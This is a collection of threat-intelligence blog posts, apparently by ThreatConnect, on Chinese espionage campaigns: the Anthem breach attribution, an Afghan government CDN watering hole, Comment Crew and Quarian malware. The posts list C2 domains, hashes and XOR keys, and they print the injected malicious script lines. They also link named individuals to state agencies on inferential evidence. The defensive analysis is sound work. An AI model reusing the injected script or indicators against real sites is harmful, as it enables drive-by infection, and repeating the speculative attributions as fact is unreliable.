The event itself was broken down into several distinct rounds of competition.  Firstly, the preliminary round required that all eligible registrants would attempt to remotely access and navigate through the network.  Should a participating team perform exceptionally in the preliminary qualifying round, they would be invited to participate in the final round on-site in Nanjing.

In this final round, participants would be required to build their own “information systems and network environments.”  The announcement notes that the students must rely upon their own laptop and software tools to accomplish this task.  Further, the announcement notes that participants are prohibited from attacking the provided server as well as their competitors.

Section Summary:

  • Song Yubo and his research center at Southeast University appear to be central players in this narrative, as highlighted by their financial connections to the government of China, in particular the Ministry of State Security (MSS), China’s premier human intelligence agency.
  • If the MSS was involved, we can deduce that the Anthem hack could have been for the purposes of gathering sensitive information for follow-on HUMINT targeting via blackmail, asset recruitment or technical targeting operations against individuals at home.
  • Song’s use of the topsec email alias suggests a greater association w/ TOPSEC.
  • It seems as if the competition is almost certainly the cause for the topsec2014[.]com domain.  What is very curious, however, is the initial registration by the reseller li2384826402@yahoo[.]com, which is a tactic seen within the confirmed malicious faux VAE Inc.infrastructure.
  • The overlap between the competition website and the static command and control infrastructure seen in the Derusbi / Sakula implant is was likely an error made by the attackers.


Tianrongxin, a.k.a. Beijing Topsec Technology Co:

The Company

To enhance our open-source capabilities, we partnered up with Dr. James Mulvenon and his team of China experts at Defense Group, Inc. (DGI).  We shared with them everything that we knew at the time, walking through the technical details which led us all the way to Song Yubo and the competition announcement.  From there, they were able to uncover a wealth of very consequential background information on Beijing Topsec Technology Co (Beijing Topsec), the sponsoring organization for Song Yubo’s information security competition.

DGI’s research indicated that Beijing Topsec is one of the largest information security hardware providers in China. In 1996, they were the first Chinese company to break into the market with the release of China’s first indigenously-manufactured firewall. Since then, they have expanded their business to include a consulting practice focused on issues such as vulnerability mining, software code analysis, threat intelligence, and encryption R&D, amongst other things.

The company served as a core technical support unit for network security at the 2008 Olympic Games – an event which was tightly controlled by the state.  Additionally, Beijing Topsec is a known partner of the Chinese military. Since 2009, the company has possessed information publication credentials for military network procurement. Since 2013, they have been publicly recognized as the Chinese equivalent of a cleared defense contractor.

The links between Beijing Topsec and the Chinese government are fairly substantial, highlighted by long-standing partnerships between even the most shadowy elements of the Chinese military.

The Leaked Cable

A very compelling piece of evidence is found in the contents of a leaked 2009 diplomatic security cable from the Department of State, published by The Guardian.  The cable is a daily digest of Diplomatic Security alerts – essentially a situational awareness primer for State Department employees to inform them of new and existing threats.  In one section, the cable highlights that the Founder of Beijing Topsec, He Weidong, had openly talked about receiving directives from the PLA in an interview with China News Network.  In the interview, the founder quite curiously states that Topsec is less a commercial entity, but rather a research institute, and that the company received about half of its start-up capital directly from the PLA.  The cable further claims that Topsec actively recruits for the PLA cyber army.


It would also appear that not only does Beijing Topsec have deep ties to state-run cyber activity, but also within the independent hacker community as well.  Of note, the company hired the notorious hacker Lin Yong, a.k.a. “Lion” (of the Honker Union of China) in the early 2000s as a security service engineer and to conduct network training.

Section Summary:

  • It is not surprising that the Chinese government would be interested in partnering with a private organization such as Beijing Topsec for use as a front for state-sponsored activity.
  • The association between Southeast University and Beijing Topsec as manifested in the joint information security research center highlights the possibility of growing links between state-sponsored activity and academic institutions, particularly those that receive funding from the central government.
  • All in all, it would seem that China is pursuing a unified approach to cyber operations, relying on all unique facets of the workforce: academia, private industry, and independent hackers, as well as the PLA to achieve their strategic goals.


The Anthem breach exposes the insidious reality of modern Chinese cyber espionage as it continues its unrelenting strikes at the soft underbelly of the American way of life.  Moreover, it demonstrates the imposing yet increasingly common reality of conducting threat intelligence analysis without substantial threat intelligence to start with.  Fortunately for us, we were able to deduce informed answers to some of the outstanding questions to this breach by scrutinizing our archival data troves that are efficiently stored within our Threat Intelligence Platform and partner integrations.  In the field of cyber security, industry professionals must learn to play the long game in order to generate a proactive sense of situational awareness, allowing for greater efficiency and flexibility in mitigating future threats.

Additionally, this incident underscores the frustrating disparity of the industry when it comes to naming conventions.  With so many threat actors and indicators floating around, it is can be frustrating to keep track of all the disparate pieces of evidence, especially when countless naming conventions are applied.  Without the use of a Threat Intelligence Platform to keep track of the flood of incoming threat data, this task would be extraordinarily time consuming at best and crippling at worst.

Moving forward, it is important to bear in mind that the adversary, regardless of country of origin, shall almost certainly leverage our every weakness against us.  Even something as seemingly innocuous as confusion over names can easily consume analytical bandwidth, creating a window of opportunity to strike.  We – that is security professionals, private industry and governments alike – must proactively harden our network defenses and hasten our incident responses as a united, synchronous entity.

We have shared details on Song Yubo and affiliated indicators within the ThreatConnect Common Community.  This share also includes the full-text DGI “BLUE HERON” research which provides greater insight into Song Yubo, Southeast University and Beijing Topsec.

All things considered, industry must learn to adopt a cooperative defense mindset in the hopes of rebuffing future attacks. The most resolute defense we have is each other, so be like ThreatConnect Research and start actively defending your own community from the next big breach. Register for a free ThreatConnect account today to get started fill out the form below to start sharing and analyzing your threat intelligence.


Operation Poisoned Helmand

In this day and age of interconnected cloud services and distributed content delivery networks (CDNs), it is important for both CDN service providers and security professionals alike to recognize and understand the risks that these systems can introduce within an modern enterprise. For organizations within both public and private sectors that leverage CDN platforms to dynamically deliver web content, it is important that the content is also routinely monitored. Otherwise, malicious third-party content can be loaded into a target organization’s website without their knowledge, delivering untold risks to unwitting visitors.

Afghan Government “Watering Hole”

The ThreatConnect Research Team recently observed a targeted cross-site scripting (XSS) “drive-by” attack that leveraged a single content delivery network resource to distribute a malicious Java applet via nearly all of the major official Government of Afghanistan websites. The compromised CDN resource in question is a JavaScript file hosted at [http:]//cdn.afghanistan[.]af/scripts/gop-script.js


The domain cdn.afghanistan[.]af is a legitimate CDN site used by the Afghan Ministry of Communications and IT (MCIT) to host web content that is displayed and used on many official websites.


The javascript URL ([http:]//cdn.afghanistan[.]af/scripts/gop-script.js) is called from numerous official Afghan Government websites, including the following:

  • [http:]//canberra.afghanistan[.]af/en (Afghan Embassy in Canberra, Australia)
  • [http:]//[.]af/fa (Herat Province Regional Government)
  • [http:]//[.]af/en (Ministry of Foreign Affairs)
  • [http:]//[.]af/en (Ministry of Commerce and Industries)
  • [http:]//[.]af/en (Ministry of Education)
  • [http:]//[.]af/en (Ministry of Finance)
  • [http:]//[.]af/fa (Ministry of Justice)
  • [http:]//[.]af/fa (Ministry of Women’s Affairs)
  • [http:]//[.]af/fa (Office of Administrative Affairs and Council of Ministers)

It is likely that this javascript URL itself is normally legitimate, but the attackers obtained access to the file and prepended the following malicious JavaScript functions to the beginning of the script:

document.write("<script src=></script>");
document.write("<script src=></script>");

Note that the websites would not need to be compromised individually for this attack to be delivered to visitors of the sites, because it is the backend CDN infrastructure that is serving up the malicious script.

Li Keqiang: A Harbinger of Targeted Exploitation?

Judging by the last modified timestamp on the HTTP response of gop-script.js, which is Tue, 16 Dec 2014 08:07:06 GMT, this malicious CDN compromise was very recent in nature. In fact, it occurred on the very same day that China’s Prime Minister Li Keqiang would meet with Abdullah Abdullah, the Chief Executive Officer of Afghanistan in Astana Kazakhstan, they would discuss infrastructure development and bilateral cooperation issues.


Looking at the EXIF metadata of the image of Keqiang meeting with Abdullah that is hosted on the Chinese embassy website we note a Tue, 16 December 2014 07:43:31 modify time as well as the[.]cn watermark in the bottom righthand corner. This indicates that the image of Keqiang and Abdullah was likely taken and edited sometime prior to 07:43:31. While it is ambiguous as to which timezone the edits actually took place in (Kazakhstan or China) we assume the date timestamp references GMT because the press release states “In the afternoon of December 15 local time…” If we assume the photograph and afternoon meeting took place sometime prior to 13:43 Alma-Ata standard time (+0600)  this would closely correspond with a 07:43 GMT time stamp. The modification of the gop-script.js by the attackers at 08:07:06 GMT likely tracks extremely close to a window of a few hours in which Keqiang met with Abdullah.


It is worth mentioning that a similar scenario occurred on June 20th when security researcher PhysicalDrive0 observed a malicious Java file hosted on the Embassy of Greece in Beijing. At the time, a Chinese delegation led by Keqiang was visiting Greek Prime Minister Antonis Samaras in Athens.  Security researcher R136a1 aka “thegoldenmessenger” released a followup blog with detailed analysis of the Greek embassy compromise.

While these two separate events are not directly related, additional research into the status of ministerial and official government websites on or around the dates of notable Chinese delegations and or bilateral meetings may yield additional patterns of interest.

Java Malware Overlap

Upon closer inspection of the prepended malicious JavaScript code, one will notice the similarity in the update.javaplug-in[.]com naming convention and URL structure to the C2 domain java-se[.]com found in the Palo Alto Networks blog post Attacks on East Asia using Google Code for Command and Control and associated with Operation Poisoned Hurricane. However, the malicious document.write driveby URLs listed above both result in 403 Forbidden errors as of December 18, 2014.

While the 403 Forbidden errors may seem like an analytic dead end, ThreatConnect Research also identified a malicious Java applet submission to VirusTotal that confirms the nature of this malicious activity. This Java applet, SHA1: 388E6F41462774268491D1F121F333618C6A2C9A, has no antivirus detections as of December 21st. The applet contains its malicious class file at the path “jre7u61windows/x86/Update.class”. This class file downloads and decodes an XOR 0xC8 encoded Windows PE executable payload from [http:]//[.]af/content/images/icon35.png, hosted on the official Afghan Ministry of Foreign Affairs site, which was also affected by the gop-script XSS.

Using historic context archived within ThreatConnect, ThreatConnect Research concluded that this Java applet is from the same source code as the applet SHA1: ADC162DD909283097E72FC50B7AB0E04AB8A2BCC, which was previously observed by ThreatConnect Research at the Operation Poisoned Hurricane related URL [http:]//[.]com/java.jar on August 15, 2014. This applet has the same class path, and downloads an XOR 0xFF encoded payload executable from the URL [https:]//[.]jp/js/dl/in.jpg. Additional indicators and context associated with this particular Java driveby activity can be found in the ThreatConnect Common Community Incident 20140815A: java-se APT Driveby (shared October 02, 2014)

The Windows PE Payload

The XOR 0xC8 encoded payload downloaded from [http:]//[.]af/content/images/icon35.png decodes into the Windows PE executable SHA1: 72D72DC1BBA4C5EBC3D6E02F7B446114A3C58EAB

This executable is a self-extracting (SFX) Microsoft Cabinet executable that is digitally signed with a valid certificate from “OnAndOn Information System Co., Ltd.”, serial number “1F F7 D8 64 18 1C 55 5E 70 CF DD 3A 59 34 C4 7D”. This same certificate was also used to sign the Java applet that downloaded this malware.

This executable drops the following files:

  • SHA1: 2068260601D60F07829EE0CEDF5A9C636CDB1765 (dllhost.exe)

Legitimate Microsoft Debugging Tools for Windows Executable, loads dbgeng.dll

  • SHA1: E2D93ABC4C5EDE41CAF1C0D751A329B884D732A2 (dbgeng.dll)

Malicious DLL that loads into the above dllhost.exe, using a similar DLL sideloading technique to that most commonly associated with the PlugX backdoor.

  • SHA1: 5C8683E3523C7FA81A0166D7D127616B06334E8D (Readme.txt)

Malicious encrypted backdoor binary blob loaded by dbgeng.dll

This backdoor connects to the faux Oracle Java themed command and control (C2) domain oracle0876634.javaplug-in[.]com. Note that javaplug-in[.]com is the same root domain found in the compromised version of [http:]//cdn.afghanistan[.]af/scripts/gop-script.js as [http:]//update.javaplug-in[.]com/o/j.js, confirming that this Java malware is in fact directly associated with the Afghan MCIT CDN XSS compromise.

Full indicators of this activity and a YARA rule to detect the malware certificate can be found in the ThreatConnect Common Community under Incident 20141217A: Afghan Government Java Driveby and signature APT_OnAndOn_cert.yara.


As the US and NATO reduce their troop levels in Afghanistan, China is posturing to fill the gap of influence that the west is leaving behind. With plans to facilitate multilateral peace talks with the Taliban and establish major transportation projects which aim to bolster the Afghan economy, Beijing has been eyeing Afghanistan as part of its broader South Asian strategy.

By exploiting and co-opting Afghan network infrastructure that is used by multiple ministerial level websites, Chinese intelligence services would be able to widely distribute malicious payloads to a variety of global targets using Afghanistan’s government websites as a topical and trusted distribution platform, exploiting a single hidden entry point. This being a variant of a typical “watering-hole” attack, the attackers will most likely infect victims outside the Afghan government who happened to be browsing any one of the CDN client systems, specifically, partner states involved in the planned troop reduction.

It is important to consider that corporate enterprises are not immune to this tactic, and this is not just a technique that is used by APT threat actors. If an enterprise’s website leverages a CDN to speed up content delivery, unintended consequences must be anticipated. Fortunately, modern browsers now implement a security concept called “Content Security Policy”. As long as the server’s response headers are configured properly, third party content may be restricted to originating from a narrow whitelist.

Just as attackers distribute malicious content to users en masse or CDN services distribute web content to users, security professionals must be able to quickly distribute actionable Threat Intelligence in formats readable by both humans and machines. ThreatConnect is the industry’s first comprehensive Threat Intelligence Platform that enables enterprises to orchestrate the aggregation of Threat Intelligence from multiple sources, use integrated analytics and a robust API that gives enterprises the control to action their own Threat Intelligence, in the cloud and on premises. Register for a free account now to view the Common Community shares and more.

Old Habits Die Hard: Iterative Intelligence & Comment Crew Activity

History is made when the notable details of past events are recorded and others can then learn from and study them. For example, you can go to any library and read about the Civil War. You can read about the many tactical skirmishes and battles. You can also learn about the outcomes of these tactical engagements, and how they influenced larger operational campaigns, where two primary belligerents executed against longer-term strategies. Many of these strategies influenced future warfare tactics and were iteratively improved upon, over time, through lessons learned. These improvements were achieved by dissecting the data points, and the successes as well as failures of those  engagements, which had been recorded and made available to historians.

While not all-encompassing, there are notable cross-sections between the modern digital world and the conventional flesh and bone one. Today’s netDefense and threat intelligence professionals understand that at the “tactical fight” level. They understand and acknowledge the need for an organization to effectively memorialize and accumulate knowledge to successfully execute their jobs. Unfortunately, there are professionals within the security industry who only look at a threat from the vantage point of an assembly line worker. They mitigate each threat as it comes down the line and wait for the next one, never looking to the past in an effort to anticipate the future.

Fortunately, ThreatConnect users are enabled to aggregate their existing private threat intelligence, analyze it against other data services and security events, and ultimately to act on the information. In the following example, we will highlight how Comment Crew (aka APT1) has recently operationalized legacy infrastructure and is using it to target a variety of victims. As cliché as it may be, even in cyber, history repeats itself.

Executive Summary:

In mid-March 2014, the ThreatConnect Research Team identified an active Comment Crew server that was hosting malicious executable malware implants made to appear as legitimate document files (within SFX RAR executables). These malware implants dropped decoy documents that included recent news articles and reports relevant to current geopolitical events, including the circumstances surrounding missing Malaysia Airlines flight MH370, and recent European economic and Trans-Atlantic trade related news.

The Comment Crew infrastructure naming convention similarities and malware attributes highlight a likely overlap with the Siesta Campaign. These indicators were shared within premium ThreatConnect industry and subscriber communities on the 17th of March within Incident 20140314B: Comment Crew HFS APT Campaign.

The command and control (C2) server 184.82.120[.]136 (Scranton, PA) recently hosted malicious content via TCP/8080 from the domains outlined in the graphic below:


Most noteworthy is that both gmailboxes[.]com and marsbrother[.]com have long been identified by ThreatConnect Research, numerous security industry researchers, and the U.S. Government as being associated with Comment Crew (aka APT1) for several years.  The first noted public reference to these domains was in 2011. This indicates that the attackers are comfortable actively reusing old infrastructure despite security industry awareness. The adversaries are likely maintaining operational successes because some security professionals possess short-term memories and myopic approaches when it comes to threat intelligence. Retaining this historic knowledge, with the ability to iteratively enrich it over time is a key characteristic of a mature threat intelligence platform. In this case, ThreatConnect allowed ThreatConnect Research and any other user who had imported and consumed legacy Comment Crew / APT1 indicators to enrich and track the infrastructure.  Had users chosen to do so, they would have been immediately alerted by ThreatConnect to any infrastructure or context changes.

ThreatConnect Research observed that the C2 server (184.82.120[.]136) had multiple ZIP and password-protected RAR files which contained the malware implants likely used in other spearphishing campaigns.


The C2 server also hosted other executables and utilities disguised as .gif files, many of which have been identified as malicious tools and libraries used by the spear-phished implants most likely for lateral movement and network persistence.

Staged Spearphishing Payloads:

The following primary weaponized spearphish payloads consisted of fake document implants. ThreatConnect Research was able to recover the following files:

Malaysia Flight MH370 Theme:

  • Malaysia_Airlines_flight_MH370_What’ (MD5: a4ea7b217f61adc2931edcb2416942ab)
  • Malaysia Airlines flight MH370 What’s needed to find it.rtf.exe (MD5: fa9694553e5f9a9443ff4a5229798d32)
  • zerk.exe (MD5: 8842babc819e2024541dcff62c003fe6)

This implant clearly refers to the news surrounding Malaysia Airlines flight MH370, and leverages a decoy document containing an article excerpt from here.


Netherlands Pulse Trawl Fishing Theme:

  • (MD5: 4d7a5f722a36e95712410844848bdbe3)
  • Agreement to double pulse trawl licences.exe (MD5: 331c16e915eedb18ca9477df4c88109c)
  • WINWORD.EXE (MD5: 0cf73c57f17b200ac7aac7688ae59265)

This implant contained a decoy document taken from a Dutch government website here.

The article refers to approval of pulse trawl licenses for Dutch fishermen, which were initially rejected by the European Parliament.


Transatlantic Economy Theme:

  • Transatlantic Economy 2014 press release –  March 10 (MD5: 336C8F0C8BDE5B4BB3974ECDD53B1FAB)
  • Transatlantic Economy 2014 press release –  March 10 2014.exe (MD5: 3568f13f839a0551986292f7c9137aa5)
  • notepad.exe (MD5: 8842babc819e2024541dcff62c003fe6)

This implant uses a decoy document from here.


Final Stage Command & Control:

The final stage implant MD5: 8842babc819e2024541dcff62c003fe6 was dropped by both the Malaysia Airlines MH370 themed dropper and the 2014 Transatlantic Economy themed dropper, while the Trawl licenses themed implant dropped a different MD5, 0cf73c57f17b200ac7aac7688ae59265.

These final stage implants are variants of the Comment Crew MiniASP Trojan, and connect to the following malicious URLs on a likely compromised website:

  • [http:]//www.ustoo[.]com/cap2k/demo.png
  • [http:]//www.ustoo[.]com/cap2k/dc.asp
  • [http:]//www.ustoo[.]com/cap2k/di.asp
  • [http:]//www.ustoo[.]com/cap2k/index.asp
  • [http:]//www.ustoo[.]com/cap2k/index1.asp
  • [http:]//www.ustoo[.]com/cap2k/rd.asp

www.ustoo[.]com is affiliated with the Medical themed Us TOO International Prostate Cancer Support Community.

These www.ustoo[.]com callback URLs are remarkably similar to the previously reported Siesta Campaign related MiniASP callbacks found at:

  • [http:]//www.heliospartners[.]com/images/demo.png
  • [http:]//www.heliospartners[.]com/images/device_blog.asp,
  • [http:]//www.heliospartners[.]com/images/device_input.asp
  • [http:]//www.heliospartners[.]com/images/device_mail.asp

Notably, the demo.png files found at both of these locations have the same image and contain the same algorithm for decrypting the encoded executable payload embedded within them. This encryption algorithm was documented on Page 72 of the Mandiant APT1 Appendix C: Malware Arsenal.


The encoded final stage implant from [http:]//www.ustoo[.]com/cap2k/demo.png decoded to the MD5: B6618129FE6ED94969527E63141429C2 (taskhostx.exe). This decoded implant is a variant of the Comment Crew Eclipse RAT, and connects to the malicious dynamic command and control domain account.jumpingcrab[.]com on IP address 103.25.56[.]44 (Adelaide, Australia).



Having the ability to regularly retain, enrich and manage knowledge is a basic requirement for any threat intelligence platform. Analysts must be able to automate and develop context around a threat, allowing them to understand the past and better prepare a defense against dynamic threat actors.

This enhanced understanding allows security professionals to adequately deliver effective decision support so that business leaders can make timely decisions. Mature enterprise netDefense and threat intelligence teams who are archiving data regarding specific threats and procedurally applying enrichments, analytics and context, would have had the opportunity to preposition mitigation scenarios around gmailboxes[.]com dating back to August of 2011 (which predates the Mandiant APT1 report).

Threat intelligence teams who were actively tracking gmailboxes[.]com subdomains within ThreatConnect would have also identified the March 11th DNS resolution to 184.82.120[.]136, enabling follow-on threat discovery processes. If they acted on this information they would have the ability to mitigate any C2 activity with a victim enterprise. The reality is that attackers do not necessarily have to create new infrastructure in order to facilitate new targeting campaigns, so data retention is vital when using threat intelligence to protect from any threat, “advanced” or otherwise.

If you or your enterprise wish to take advantage of ThreatConnect to aggregate, analyze and act on Threat Intelligence check out the various ThreatConnect product editions and deployment options. Register for a free Basic account now.

ThreatConnect Gets to the Root of Targeted Exploitation Campaigns

Executive Summary:

With 2013 coming to a close, many of us within the security industry take the time to reflect on the notable events that occurred over the past year.  It is often in these quiet times of contemplation that we find clarity and carry forward the lessons learned into the next year.

Unfortunately, with the complexities of modern enterprise security, there is far too much for us to remember individually.  It is the day-to-day, “in the trenches”, tactical fight that distracts many professionals from focusing on the strategic planning that serves as a guidepost for executing our longer term objectives.  Because of the amount of data to keep up with, key pieces of information slip through our fingers like sand.

Fortunately, the members of the ThreatConnect community have one less thing to commit to memory.  All of our users benefit from a shared perspective and ThreatConnect’s ability to retain and automate associations of related security events.

The following use case highlights how previous Adobe Flash driveby targeting campaigns, directed against Tibetan, Uyghur, and Chinese dissident victims in the Spring of 2013, have been automatically associated to a newly related security event which occured in mid-December, nearly eight months later.

Operational Caveat:  At the time of this writing ThreatConnect Research is currently working with Adobe and Microsoft to validate the specific nature of the exploit being leveraged.  ThreatConnect Research will update Incident 20131216A: TibetOnline Flash Driveby as new information becomes available.

New Findings:

On December 16, 2013, the ThreatConnect Research Team identified an Adobe Flash Player SWF heap spray component on a Tibetan website.  The SWF file was found at the URL hXXp://www.tibetonline[.]info/test.swf, and may have been active since September 1, 2013 according to the “Last Modified” field within the HTTP response.


This Flash file, MD5: 4C37EC9F600AD90381DF2CCDCB00B0E6, is not actually the entire exploit; it is merely a heap spray shellcode component that also contains an embedded XOR 0x95 encoded payload executable. ThreatConnect Research has been able to confirm that the exploit is not leveraging a vulnerability in Adobe Flash Player. At the time of reporting, the exact application being exploited or initial exploitation vector is unknown. The XOR 0x95 executable embedded within test.swf decodes to the MD5: 26E442AA18FCEA38E4C652D346627238. It is worth noting that as of December 18, 2013, this malicious binary is only detected generically by 2 of 49 antivirus vendors in VirusTotal.

The binary is a backdoor implant which begins its routine by connecting to a Yahoo! blog found at the URL hXXp://[.]com/_JV67DRO5Y3JCOEVLMA5HXTNZT4/ and checking for the XOR 0x7E encoded hex string “7e160a0a0e4451511c1f1d15500c11110a1b0c500a1551=”.


This string is decoded to form the second stage command and control (C2) URL at hXXp://back.rooter[.]tk/script. This URL returns XML script containing version information and returning the client (victim) IP address.


The rooter[.]tk domain connects this recent exploit activity to a CVE-2013-0634 Flash exploit campaign from the spring of 2013 that ThreatConnect Research reported within APT #TargetedAttacks within @SocialMedia.  Although the rooter[.]tk domain was not specifically highlighted in this blog post, ThreatConnect Research included it within  ThreatConnect Incident 20130408A: Twitter Threats Blog and shared the incident with the ThreatConnect Community on April 8th 2013. ThreatConnect Research observed this domain as a CVE-2013-0634 driveby location with the URL hXXp://www.rooter[.]tk/my.swf.

rooter TC

Later in mid-May 2013, security researcher and contributor to the ThreatConnect Community Clement Lecigne, shared details of a CVE-2013-1347 Internet Explorer (IE) exploit he found on the Voice of Tibet (VoT) website which downloaded in a payload executable from hXXp://www.rooter[.]tk/calc.exe, as seen in Incident 20130516A: Voice of Tibet Incident.  It is clear that the rooter[.]tk domain has been used consistently to target individuals and organizations associated with the Tibetan independence movement and continues to be active even as 2013 draws to a close.


As of mid-December, ThreatConnect Research has discovered a new exploit component that correlates with legacy “driveby” infrastructure previously identified in targeted exploitation campaigns directed against Tibetan interests.  While this shows how little these persistent attackers have changed over the course of a year.  It also highlights how without ThreatConnect and the value of a shared community, security professionals can potentially overlook key observations while they drown under the volume of meaningless data feeds.

Overwhelmed net defense teams are often challenged in identifying and correlating previous activity with current activity in a timely manner.  Without ThreatConnect’s automated associations capabilities, the memorialization of indicators, collaborative analytics and detailed context, the malicious rooter[.]tk domain may have been long forgotten.

The incident associated with the latest rooter[.]tk activity has been shared across all ThreatConnect Communities as Incident 20131216A: TibetOnline Flash Driveby. ThreatConnect Research will continue to provide dynamic updates to this incident within ThreatConnect as additional details become available.

If you or your enterprise security team are overwhelmed by feeds of meaningless data, and are unable to quickly contextualize or automate associations of activity, register for a ThreatConnect account.  Take control of your data, make sense of complex security events, and privately collaborate with other industry experts.

Divide and Conquer: Unmasking China's 'Quarian' Campaigns Through Community


In August and September, the ThreatConnect Research Team observed an increase in targeted attacks with a custom implant known as “Quarian.”  Based on links between current and historic activity, we are confident that it is a subset of a single Chinese Advanced Persistent Threat (APT) group using the implant and other previously observed tactics.  The focus of the attacks appears to be aimed at those involved with Syrian, broader Middle Eastern, and Islamic issues as previously observed from industry reporting.  This increase was also noted by McAfee-Labs in a blog from early October 2013. ThreatConnect Research took a focused look at the historic and recent Quarian activity to come to a few conclusions about the Quarian threat itself.

ThreatConnect Research assesses that the the increase in activity that lasted into September was due to the increased tensions over rumors of a US intervention against the Assad regime and the eventual agreement by Syria to put its chemical weapons under international control.  China has an ideological interest to maintain its policy of non-interference in sovereign nations affairs, a stance it often cites when accused of its own human rights violations, but remains highly interested in the evolving situation in Syria.  While the international attention on Syria has again taken a lull in recent weeks, the situation there has by no means been fully resolved, and neither has China’s interest in it.  If international tensions rise to the point of potential military intervention again, there will likely be increased Quarian activity in support of China’s intelligence requirements around the issue.

The Quarian operators have not varied their malware, infrastructure, or overall capabilities much since last year, which allows members of the ThreatConnect Communities to follow and collaborate together in an effort to better defend their respective enterprises from Quarian activity.  Despite the lull in Quarian reporting prior to last month, the group using the implant has quietly continued their operations, regardless of moderate to high antivirus (AV) detection and industry reporting.

Quarian activity was first publicly highlighted in late November 2012, by the Kaspersky Global Research & Analysis Team (GReAt), which issued a blog on Securelist that analyzed the attachment of a spearphishing email that had been pulled from a dump of Syrian Ministry of Foreign Affairs (MoFA) documents publicly released by the Anonymous collective.  The implant dubbed Quarian (or “Dougat”) by the AV community, was also reported by TrendMicro in a follow up blog as additional spearphishing emails and trojanized documents were discovered.  In a noteworthy example, one of these attempts targeted the US State Department.  The SourceFire Vulnerability Research Team (VRT) also followed up by publishing an analysis of Quarian’s custom command and control (C2) protocol.  Interest from the community eventually waned and published research of the Quarian threat slowed by 2013.

Quarian Targeting:

Although not exclusively the case, the theme of the trojanized documents focused mainly on Middle Eastern or Islamic diplomatic issues.  In the case of “Beware_of_the_shadows_behind_the_Syrian_issue_.doc“ (MD5: 4B39C6A453440D88B8397540EF54344C) the Quarian actors revisit the Syrian conflict theme.  The malicious document drops the implant “iexplorer.exe” (MD5: 458C1D3D3FFCFF137009404E235DF57C).  The content of the infected document is taken directly from an English version of the Chinese state run People’s Daily editorial located here.  Secondly, another document exploit “Sajjad Karim’s statement on HR situation.doc” (MD5: C8E85628B0B656A467D2E6BD19AB2DE7), drops the implant “update.exe” (MD5: E1F509EC36E38ECAF0A9A064FE0D58CC).  Saijad Karim is a member of the European Parliament, elected in 2004 as its first British Muslim.  As noted, this European Union themed document indicates that the Quarian targeting activity is likely not directed against individuals and organizations with just Syrian or Middle Eastern interests but possible broader regional security interests.  Another exploit, “Top_10_striking_women_in_Asia.doc”, used the common lure of beautiful women to entice the would-be victim to open the document.  The following table shows all filenames from a few recent Quarian targeting campaigns.

figure_1Table 1. Quarian Document Exploits and Implants

Common Quarian Infrastructure:

Although multiple threat groups often have access to and use the same backdoors (because they are available publicly, commercially, or shared amongst threat groups) it is typically not sound analytic practice to link disparate activity together by looking at the malware alone.  One of the most practical applications of “The Diamond Model” – used as a guidepost within ThreatConnect intelligence research and analysis – is linking activity by more than one diamond vertex (e.g. malware to infrastructure, actor to malware, etc.).  In the case of recent Quarian activity, we can see clear linkages in both the current malware and the infrastructure to earlier identified campaigns.  This underscores the importance of tracking details and tactical indicators, identified in past events, to enable a proactive and preventative stance in the face of future targeted attacks.

Prior to the October McAfee Quarian blog, the ThreatConnect Community has seen fifteen unique samples, eleven since last August, all of which used the C2 infrastructure outlined in Table 2.  The compile times suggest five to six distinct targeting waves, with the earliest wave fitting the time frame of the original Kaspersky blog and the latest occurring in early September of this year.

Note that MD5: 3C7AD543E77E54DB95DB6D26B21159D8 is listed twice because it was dropped from two separate implanted documents Building_a_Relationship_with_Your_Children.doc and Top_10_striking_women_in_Asia_.doc.

table_2 Table 2: Compile times, Quarian Implants and associated C2 domains

The following malware analysis data within Table 2 was compiled from analysis results obtained with Joe Sandbox.  For more information about the Joe Sandbox please visit Joe Security.

Since early August, the domains referenced in Table 2 have resolved to the same handful of IP addresses as seen in Table 3 thus far:

figure_3Table 3. Quarian C2 IP Address Infrastructure and resolutions

In addition to the domains in Table 2, sureshreddy1.dns05[.]com, which was reported in last year’s Kaspersky blog, had previously resolved concurrently to several of these IP addresses.  The domain fouiskrish.ns01[.]info has previously resolved  to some of these IP addresses at the same time as those in Table 2.  The example of “DNS tracks” seen in Figure 1, compiled within ThreatConnect, also demonstrate how the C2 infrastructure from the Quarian samples consistently resolve to the same IP addresses.  This firmly establishes a common infrastructure usage connection across known samples of the Quarian backdoor.


Figure 1. IP resolutions.

According to IP Whois data, three of these IP addresses 216.244.81[.]141, 216.176.190[.]197, and 216.176.190[.]205 are registered to a private customer through wowrack[.]com, a managed hosting provider (see figures 3 and 4 below).  The private customer appears to be located out of Dalian, China. The name ZHAOWEIWANG is associated with the network IP allocations. The resolutions to these networks began in mid-August and persisted through October and continue to publication.  The IP address 216.244.81[.]41 is associated to another apparent China located private wowrack[.]com customer, with the name ZHOUJUN associated with the IP address range.


A similar pattern is seen with two more of the IP addresses, 50.117.123[.]108 and 50.117.120[.]112. These addresses were active some time prior to the resolution of the Wowrack IP addresses, from May to early September.  As is seen in Figures 5 and 6 below, these IPs are leased to a LiaoZhiBin, based in Shanghai, China through EGI Hosting.


Note: This does not imply that any of the entities leasing these netblocks, or their hosting providers, are responsible or even aware of the malicious infrastructure resolving to their networks.

Another interesting piece of historic data concerning the resolutions of the sureshreddy1.dns05[.]com domain.  As evidenced in the Securelist blog post, this domain was resolving to IP addresses in the Beijing netblock (ASN 4808).  More recently on September 23rd, the Quarian C2 domain everyday.xxuz[.]com also resolved to an IP in this netblock. This ASN / netblock is quite notorious for its association with suspected Chinese APT activity and has been previously related to the Mirage Campaign as well as domains found in our own Khaan Quest blog and another blog post from earlier this year.  It seems in this campaign that the actors have largely moved away from using the Beijing based IP ranges in favor of rotating through hosting providers for their “victim facing” C2 nodes.  Still, the historic use of these netblocks suggests the Quarian campaigns may be linked to a much broader set of related APT activity.

Exploits Leveraged:

